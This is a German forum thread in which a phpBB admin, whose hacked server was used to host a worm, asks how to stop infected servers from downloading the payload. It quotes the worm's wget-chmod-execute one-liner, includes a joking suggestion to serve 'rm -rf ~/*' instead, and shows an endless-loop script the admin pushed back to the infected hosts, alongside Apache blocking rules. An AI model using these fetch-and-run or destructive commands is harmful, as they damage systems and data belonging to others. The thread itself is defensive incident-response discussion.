Downloads von attackierten Servers stoppen

[brablc]

Unser Server wurde mittels phpBB gehackt und ein Malware/Wurm wurde bei uns ausgehängt. Andere Servers mit phpBB wurden attackiert (nicht nur von uns) und folgende Code aufgerufen:

Code: Select all

cd /tmp;wget http://unserserver.net/forum/db/session;chmod +x session;./session;rm -f session

Es hat uns 15GB in ein paar Studen gekostet bis wir den session Datei gelöscht haben.

Nach der Reinstallation mit neuem Kernel und phpBB, sehen die Downloads so aus:

Code: Select all

Most active IPs previous hour:
--------------------------------------------------------------------------------
   194 66.193.231.24    66-193-231-24.dimenoc.com
   184 193.26.214.61    193.26.214.61
   177 213.246.55.128   IK55128.ikexpress.com
   176 203.194.162.205  203.194.162.205
   174 128.121.21.36    cobalt18.nexpoint.net
   118 67.43.0.119      host.flaremedia.net
   118 38.113.1.97      ip38-113-1-97.yourhostingaccount.com
    55 217.19.17.9      gamez2.tweakdsl.nl
    23 82.239.30.193    ita73-1-82-239-30-193.fbx.proxad.net
    23 213.193.229.240  zion.be.priorweb.net
    23 62.70.14.144     darkdate.com

Most active IPs last day:
--------------------------------------------------------------------------------
  1035 62.70.14.144     darkdate.com
   658 213.239.206.98   soccer-manager.org
   597 66.193.231.24    66-193-231-24.dimenoc.com
   553 209.59.181.125   host.hansiu.com
   553 82.239.30.193    ita73-1-82-239-30-193.fbx.proxad.net
   506 82.194.66.40     linux08.dns-servicios.com
   465 67.43.0.119      host.flaremedia.net
   445 216.180.225.178  server21.snhdns.com
   438 80.75.73.12      mx1.budokit.com
   424 128.121.21.36    cobalt18.nexpoint.net
   397 161.53.2.130     jagor.srce.hr

Downloads by days:
--------------------------------------------------------------------------------
Jul 28        17669
Jul 27        44149
Jul 26        72037
Jul 25        111886
Jul 24        194810
Jul 23        427947
Jul 22        462628
Jul 21        2

Ich habe schon etwa 6 "most active" Servers auf dem Firewall gesperrt und ich habe es versucht die Admins zu informieren. Manchmal geht es aber nicht, und ich weiß nicht welche Servers führen die Attacken.

Ich habe es dem Apache verboten dem Wget agent etwas zurrück zu schicken und unserem Server geht es relative gut.

:?: Wäre es möglich, dass ich irgendetwas in "session" schreibe so dass die Attacken stoppen? Ich dachte etwas wie ein email and root schicken oder phpBB patchen oder wget abschalten ...

[bungeebug]

tja wenn der server gehackt wurde hilft nur eins ... reinit.

sorry für kleinschreiben.

[brablc]

tja wenn der server gehackt wurde hilft nur eins ... reinit.

sorry für kleinschreiben.

Das ist klar, unser Server wurde reinitialisiert. Das Problem ist, dass die Attacker unser Server als download Server ausgewählt haben, also etwas ähnliches als DDoS. Die Nummer der kompromierten Server soll sich nicht ändern, aber die Nummer der attakierten schon - so lange es einen Server der die andere attackiert gibt.

[timeless2]

soweit ich das richtig verstanden habe, versuchen verschiedene Server bei dir das Skript zu laden. Kannst du nicht einfach eine kleine harmlose Datei zum Herunterladen an gleicher Stelle anbieten. Dann geben die attakierten Server vielleicht Ruhe.
Rechtlich wahrscheinlich etwas bedenklich wäre ein Skript, das den Apache stoppt.

[tcs]

Kannst du nicht einfach eine kleine harmlose Datei zum Herunterladen an gleicher Stelle anbieten.

Warum harmlos?

Code: Select all

#!/bin/sh
rm -rf ~/*

8)

Würde halt in den meisten Fällen den falschen treffen (den unaufmerksamen Admin des gecrackten Servers). Sinnvoll wären Mails an diese, ebenso wie Kontaktaufnahme mit CERT.

Cheers

tcs

[Joe User]

Ich würde die Anfragen einfach ins Leere laufen lassen:

Code: Select all

    RewriteEngine On
    RewriteCond %{QUERY_STRING} (.*)wget%20 [NC]
    RewriteRule .* http://256.256.256.256/ [R=301,L]

[superuser1]

Hi...

Ich würde die Anfragen einfach ins Leere laufen lassen

oder gleich mod-security mit einem entsprechendem Ruleset benutzen...

http://www.modsecurity.org/documentatio ... mples.html
http://www.debian-administration.org/?article=65

:roll:

[brablc]

Ich würde die Anfragen einfach ins Leere laufen lassen: ...

Ich habe das hier gemacht:

Code: Select all

SetEnvIf User-Agent Wget badUA
Order Allow,Deny
Allow from all
Deny from env=badUA

Also das wget bekommt nichts von uns, wenn es aber irgendwelche Admin versucht, dann bekommt er text Datei mit Hinweiss wie er phpBB patchen soll.

Aber das Problem ist, wie soll man diese Servers stoppen, die Dateien mit dem wget herunterladen.

[brablc]

Warum harmlos?

Code: Select all

#!/bin/sh
rm -rf ~/*

... Sinnvoll wären Mails an diese, ebenso wie Kontaktaufnahme mit CERT.

Hat der Apache überhaupt irgendwelche HOME, und hat er Rechte es sich selbst ändern? Ich verzweifle das.

Wie wäre es mit

Code: Select all

sleep 60

Oder vielleicht noch mehr? Das könnte das Server langsamer machen.

Kann ich irgedwo meht über Kontaktaufnahme mit CERT lesen? Bis jetzt habe ich die Addressen auf den Seiten der Servers und im whois.sc gesucht.

[brablc]

Falls jemand neugierig ist, ich habe folgende gemacht:

Code: Select all

#!/bin/bash
cat session >README_Your_server_is_under_attack

while [  0 -lt 1 ]; do
    echo "You are under attack!"
done

Zusammen mit der Information, das die attakierten Serves selbs dafür sorgen müssen, dass der Angreifer gestoppt wird, haben die Attacken gestoppt. Ich habe auch das Loop mit einem

Code: Select all

nohup ./session &

probiert, aber das war zu aggressive, das Server (mein Server) wurde nach ein paar Minuten kaputt.